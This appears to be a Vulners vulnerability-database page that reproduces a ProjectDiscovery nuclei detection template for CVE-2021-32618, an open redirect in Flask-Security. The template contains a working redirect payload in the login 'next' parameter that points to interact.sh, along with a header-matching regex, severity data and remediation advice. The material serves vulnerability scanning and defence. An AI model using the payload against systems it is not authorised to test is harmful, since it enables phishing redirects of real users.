Lucene search
K

Python Flask-Security - Open Redirect

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

Python Flask-Security - Open Redirect vulnerability. Allows redirecting users to a malicious site

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-32618
27 Apr 202309:58
circl
CNNVD
flask-security 输入验证错误漏洞
17 May 202100:00
cnnvd
CVE
CVE-2021-32618
17 May 202118:05
cve
Cvelist
CVE-2021-32618 Open Redirect Vulnerability
17 May 202118:05
cvelist
Github Security Blog
Open Redirect in Flask-Security-Too
17 May 202120:51
github
Github Security Blog
Open Redirect in Flask-Security-Too
14 Dec 202118:14
github
GitLab Advisory Database
Open Redirect in Flask-Security-Too
17 May 202100:00
gitlab
NVD
CVE-2021-32618
17 May 202118:15
nvd
OSV
GHSA-6QMF-FJ6M-686C Open Redirect in Flask-Security-Too
17 May 202120:51
osv
OSV
GHSA-GXJJ-F44V-QM94 Open Redirect in Flask-Security-Too
14 Dec 202118:14
osv
Rows per page
id: CVE-2021-32618

info:
  name: Python Flask-Security - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities.
  remediation: |
    Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability.
  reference:
    - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
    - https://github.com/Flask-Middleware/flask-security/issues/486
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32618
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-32618
    cwe-id: CWE-601
    epss-score: 0.17067
    epss-percentile: 0.95116
    cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: flask-security_project
    product: flask-security
  tags: cve2021,cve,redirect,flask,flask-security_project,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/login?next=\\\interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a004730450220403d2b95a7b5a3b26a5c68591474340cf27c137f0b94fab29eb8c58246b73249022100e6ceef29e4eb623bd11e3a6fb35b2ede2d579221346cbbd359e8877c040d2b5d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 25.8
CVSS 3.13.1 - 6.1
EPSS0.17067
34